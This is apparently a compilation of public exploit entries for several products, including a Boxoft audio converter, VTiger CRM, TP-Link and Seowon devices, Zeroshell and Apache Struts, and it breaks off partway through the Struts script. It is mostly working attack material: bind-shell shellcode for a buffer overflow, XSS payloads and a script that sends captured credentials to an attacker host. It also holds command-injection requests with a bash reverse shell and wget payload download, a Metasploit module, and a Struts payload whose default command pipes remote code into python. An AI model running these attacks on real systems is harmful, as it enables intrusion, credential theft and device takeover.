// Exfiltration via a cross-origin GET: the captured values end up in the URL
// path, so they are visible in proxy and web-server access logs on both sides.
var url = "http://attacker.site/" + email + ":" + password;
// Presumes jQuery ($) is already loaded on the host page — not shown here, verify.
$.get(url);
# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2020-11-22
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
# Tested Version: 2.3.0
# Vulnerability Type: Local Buffer Overflow (SEH)
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en
# Steps to Produce the Local Buffer Overflow (SEH):
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
# 2.- Open AudioConvert.exe
# 3.- Try
# 4.- Batch Convert Mode -> Next
# 5.- Add
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
# 7.- Port 4444 open
#!/usr/bin/env python
#-*-coding: utf-8-*-
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"
"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"
"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"
"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"
"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"
"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"
"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"
"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"
"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"
"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"
"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"
"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"
"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"
"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"
"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"
"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"
"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"
"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"
"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"
"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"
"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"
"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"
"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")
# Layout of the .wav written below: [ 4132 x 'A' | NSEH | SEH | 16 NOPs | shellcode ].
# The 4132-byte offset matches the Boxoft Convert Master PoC above.
nSEH = "\xeb\x06\x90\x90"
# Little-endian 0x004068B8, an address inside the main executable itself; that
# only works while the binary loads at its fixed base (presumably no ASLR/SafeSEH
# on AudioConvert.exe — not shown here).
SEH = "\xB8\x68\x40\x00" #AudioConvert.exe
buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode
# Python 2 semantics assumed (str holding raw bytes written in text mode).
f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")
f.write(buffer)
f.close()
# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
# Date: 2020-11-18
# Exploit Vulnerability-Lab
# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
# Software Link: https://sourceforge.net/projects/vtigercrm/files/
# Version: v7.0
Document Title:
===============
VTiger v7.0 CRM - (To) Persistent Email Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2227
Release Date:
=============
2020-11-18
Vulnerability Laboratory ID (VL-ID):
====================================
2227
Common Vulnerability Scoring System:
====================================
4.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Vtiger CRM is a web-application built using PHP. Choose the best CRM for
your business. Custom Module & Relationship builder for
VTiger is a very useful extension that allows crm administrators to
create custom modules within few clicks. All custom modules
are created following strict VTiger standards. In addition, the
relationship builder allows crm admin to link together existing modules
as well as new custom modules.
(Copy of the Homepage:
https://www.vtiger.com/open-source-crm/download-open-source/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
cross site vulnerability in the VTiger v7.0 CRM open-source web-application.
Affected Product(s):
====================
VTExperts
Product: VTiger v7.0 - CRM (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)
2020-04-28: Researcher Notification & Coordination (Security Researcher)
2020-04-29: Vendor Notification 1 (Security Department)
2020-05-30: Vendor Notification 2 (Security Department)
2020-06-22: Vendor Notification 3 (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official VTiger v7.0 CRM open-source web-application.
The vulnerability allows remote attackers to inject their own malicious script
code with a persistent attack vector, compromising
browser-to-web-application requests from the application side.
The persistent cross site scripting web vulnerability is located in the
`searchValue` Parameter of the `Emails Compose` module.
Attackers are able to inject their own malicious script code in the `To` sender
input field of the email compose module to attack other
user accounts. The email can be delivered with multiple recipients,
which allows an attacker to insert the target email and a
malicious payload. The request method to inject is GET via searchValue
and POST on compose with persistent attack vector.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
[+] GET
Vulnerable Module(s):
[+] Email Compose (index.php?module=Emails)
Vulnerable Input(s):
[+] To (Sender - Email)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by
remote attackers with a low-privileged account and low user interaction.
For security demonstration or to reproduce the cross site web
vulnerability follow the provided information and steps below to continue.
PoC: Url
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#
Manual steps to reproduce the vulnerability ...
1. Open the web-application ui
2. Login with a regular user role to the ui
3. Open vendors and move to compose to email form
4. Inject malicious payload as "to" sender information and as well a
valid email to target
5. Send the request after the compose
6. Wait until the administrator or higher privileged targeted users
click in the email or receives the email on preview
7. Successful reproduction of the cross site scripting web vulnerability!
PoC: Vulnerable Source (Execution Point)
<div class="col-lg-12"><div class="col-lg-2"><span
class="pull-right">To <span class="redColor">*</span></span></div>
<div class="col-lg-6"><div class="select2-container
select2-container-multi autoComplete sourceField select2"
id="s2id_emailField" style="width: 100%;"><ul class="select2-choices
ui-sortable"> <li class="select2-search-choice">
<div>IT <b>(test@test.com)</b></div> <a href="#"
class="select2-search-choice-close" tabindex="-1"></a></li>
<li class="select2-search-choice"><div><iframe src"evil.source"
onload=alert(document.cookie)></div></iframe></div>
--- PoC Session Logs [GET] ---
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer:
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10 (Debian)
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Content-Type: text/json; charset=UTF-8
http://localhost:8080/vtigercrm/evil.source
Host: localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10
Content-Length: 299
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Reference(s):
http://localhost:8080/vtigercrm/
http://localhost:8080/vtigercrm/index.php
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=
Security Risk:
==============
The security risk of the persistent web vulnerability in the
web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
# Date: 2020/07/29
# Exploit Author: malwrforensics
# Vendor Homepage: https://tp-link.com
# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip
# Version: TL-WA855RE(US)_V5_200415
# Tested on: N/A
# CVE : 2020-24363
Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware
Details
By default the web interface of the TL-WA855RE wireless extender requires users to log in in order to access the admin interface. However, an attacker on the same network can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.
To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.
POST /?code=5&asyn=0 HTTP/1.1
Host: <redacted>
Content-Length: 7
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: text/plain;charset=UTF-8
Origin: http://<redacted>
Referer: http://<redacted>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
0|1,0,0
# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.nopcommerce.com/
# Version: 4.30
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29475
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
Attack vector:
This vulnerability allows an attacker to inject an XSS payload into Schedule tasks; each time any user visits that page of the website, the XSS triggers and the attacker may be able to steal the cookie, depending on the crafted payload.
Vulnerable Parameters: Schedule tasks.
Steps-To-Reproduce:
1. Go to the nopCommerce Store admin page.
2. Now go to the System-Schedule tasks option.
3. Now click to on edit button on any task.
4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
5. Now click on Update button.
6. The XSS will be triggered.
POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 335
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/Admin/ScheduleTask/List
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: xyz
Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
# Date: 5 Aug 2020
# Exploit Author: maj0rmil4d
# Vendor Homepage: http://www.seowonintech.co.kr/en/
# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: 1.0.11 (Possibly all versions)
The default user/pass is admin/admin.
Commands run as the root user.
The vulnerability is in the ipAddr parameter of system_log.cgi.
Usage:
login to the dashboard.
setup your listener.
download the revshell.txt with the RCE
run the revshell.txt
* here is the RCE request :
POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang
CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&=
reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
* to get a reverse shell, setup the listener and download the file on the r=
outer then run it .
* the content of the revshell.txt :
bash -i >& /dev/tcp/192.168.1.10/45214 0>&1
* to download :
POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang
CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell=
.txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp=
ly&T1596644096617
* to run it :
POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang
CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&=
queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
# Exploit module for CVE-2019-12725: unauthenticated command injection in
# Zeroshell 3.9.0 through the x509type parameter of /cgi-bin/kerbynet, with
# root obtained via the NOPASSWD sudo rule for /bin/tar (see Description).
# Defensive notes: the fix is the vendor update plus removing the passwordless
# tar sudo rule; the request built in execute_command (Action=x509view,
# Section=NoAuthREQ, x509type containing "%0A" and "--checkpoint-action")
# is the network-level indicator to alert on.
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
# Module metadata and options. RPORT defaults to 443 and SSL is on by default.
def initialize(info = {})
super(update_info(info,
'Name' => 'Zeroshell 3.9.0 Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability
found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
As sudo is configured to execute /bin/tar without a password (NOPASSWD)
it is possible to run root commands using the "checkpoint" tar options.
},
'Author' => [
'Juan Manuel Fernandez', # Vulnerability discovery
'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
],
'References' => [
['CVE', '2019-12725'],
['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
],
'DisclosureDate' => 'Jul 17 2019',
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X86 ],
'Targets' => [
['Zeroshell 3.9.0 (x86)', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
}],
],
'DefaultTarget' => 0,
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
])
end
# Sends a single GET to /cgi-bin/kerbynet with the (pre-encoded) command
# embedded in the x509type parameter; encode_params is false so the string is
# sent verbatim. `opts` is accepted for the CmdStager interface but unused.
# Returns whatever send_request_cgi returns (nil on transport failure).
def execute_command(cmd, opts = {})
command_payload = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
print_status("Sending stager payload...")
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/kerbynet',
'encode_params' => false,
'vars_get' => {
'Action' => 'x509view',
'Section' => 'NoAuthREQ',
'User' => '',
'x509type' => command_payload
}
)
return res
end
# Rewrites cmd for the injection context. NOTE: every substitution uses gsub!,
# so the caller's String is mutated in place and the same object is returned.
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
cmd.gsub!(/;/, " %0A ")
cmd.gsub!(/ /, '+')
cmd.gsub!(/\//, '%2F')
return cmd
end
# Vulnerability check: runs `id` through execute_command and reports Appears
# only when the body contains "uid=0(root)"; a nil response yields Safe.
def check
res = execute_command('id')
if res && res.body.include?("uid=0(root)")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
# Entry point: delegates staging to the CmdStager mixin (wget flavor, 5s
# delay), which invokes execute_command for each stage.
def exploit
print_status("Exploiting...")
execute_cmdstager(flavor: :wget, delay: 5)
end
end
# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
# Google Dork: "Apache OpenMeetings DOS"
# Date: 2020-08-28
# Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research)
# Vendor Homepage: https://openmeetings.apache.org/
# Software Link: https://openmeetings.apache.org/
# Version: 4.0.0 - 5.0.0
# Tested on: Windows
# CVE: CVE-2020-13951
- POC:
# Vulnerability variable: hostname
# Payload: x.x.x.x;ls
# Request exploit:
GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026
- Reference:
https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E
https://nvd.nist.gov/vuln/detail/CVE-2020-13951
# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated)
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.6
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29471
Vulnerable Parameters: Profile Image.
Steps-To-Reproduce:
1. Go to the opencart admin page.
2. Now go to the profile page.
* Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as payload.png
3. Now edit the image and upload the image as payload.png.
4. The XSS will be triggered.
# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation
# Date: 08/18/2020
# Exploit Author: West Shepherd
# Vendor Homepage: https://struts.apache.org/download.cgi
# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)
# CVE : CVE-2019-0230
# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.
# Source(s):
# https://github.com/PrinceFPF/CVE-2019-0230
# https://cwiki.apache.org/confluence/display/WW/S2-059
# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22
# !/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import logging
class Exploit:
# Probe for Apache Struts S2-059 / CVE-2019-0230 (double OGNL evaluation).
# A single multipart/form-data POST is sent; the OGNL expression travels in
# the part's filename attribute. NOTE(review): indentation was lost in this
# copy and several string literals are wrapped across physical lines (the
# payload and the default command below), so the listing does not parse as
# Python in this form.
def __init__(
self,
target='',
redirect=False,
proxy_address=''
):
# Silences the warning that verify=False (in do_get/do_post) would emit.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
self.target = target
self.session = requests.session()
self.redirect = redirect
# Assigned but never read: do_get/do_post pass no timeout to requests, so a
# request can block indefinitely.
self.timeout = 0.5
# Both schemes are routed through a plain-http proxy URL when one is given.
self.proxies = {
'http': 'http://%s' % proxy_address,
'https': 'http://%s' % proxy_address
} \
if proxy_address is not None \
and proxy_address != '' else {}
self.query_params = {}
# Never read in this class.
self.form_values = {}
self.cookies = {}
boundary = "---------------------------735323031399963166993862150"
self.headers = {
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Accept': '*/*',
'Connection': 'close'
}
# OGNL expression: clears the excluded-package/class lists and the
# member-access guard, runs {COMMAND} via ProcessBuilder and copies its
# output into the HTTP response. Detection: a multipart filename containing
# "%{" followed by a NUL byte (the "\0b" appended below) is the indicator.
payload = "%{(#nike='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?(#_memberAccess=#dm):" \
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
\
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
\
"(#ognlUtil.getExcludedPackageNames().clear())." \
"(#ognlUtil.getExcludedClasses().clear())." \
"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
\
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
"(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \
"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()."
\
"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
\
"(#ros.flush())}"
# Hand-built multipart body: the OGNL expression becomes the filename of the
# "foo" part; {COMMAND} is substituted in send_payload.
self.payload = "--%s\r\nContent-Disposition: form-data;
name=\"foo\"; " \
"filename=\"%s\0b\"\r\nContent-Type:
text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % (
boundary, payload, boundary
)
# GET helper. verify=False disables TLS certificate validation. Passing
# data= to session.get is unusual but is what the original does.
def do_get(self, url, params=None, data=None):
return self.session.get(
url=url,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
data=data,
params=params
)
# POST helper; same session, headers, cookies and proxies as do_get, and
# likewise no certificate validation and no timeout.
def do_post(self, url, data=None, params=None):
return self.session.post(
url=url,
data=data,
verify=False,
allow_redirects=self.redirect,
headers=self.headers,
cookies=self.cookies,
proxies=self.proxies,
params=params
)
# Turns on http.client wire-level debug output and DEBUG logging for
# urllib3 (the Python 2 httplib fallback is kept). Returns self for chaining.
def debug(self):
try:
import http.client as http_client
except ImportError:
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
return self
# POSTs the body with {COMMAND} replaced by `command` to self.target and
# returns the requests Response. The stdout message carries no trailing
# newline. A None command (no -command flag) would raise in replace().
def send_payload(self, command='curl --insecure -sv
https://10.10.10.10/shell.py|python -'):
url = self.target
stdout.write('sending payload to %s payload %s' % (url, command))
resp = self.do_post(url=url, params=self.query_params,
data=self.payload.replace('{COMMAND}', command))
return resp
if __name__ == '__main__':
# CLI entry point. NOTE(review): the description string says 'CVE-2020-0230'
# whereas the header of this file gives CVE-2019-0230.
parser = argparse.ArgumentParser(add_help=True,
description='CVE-2020-0230 Struts
2 exploit')
try:
# -target has no default; omitting it yields target=None and a POST to
# url=None, which surfaces only through the generic handler below.
parser.add_argument('-target', action='store', help='Target
address: http(s)://target.com/index.action')
parser.add_argument('-command', action='store',
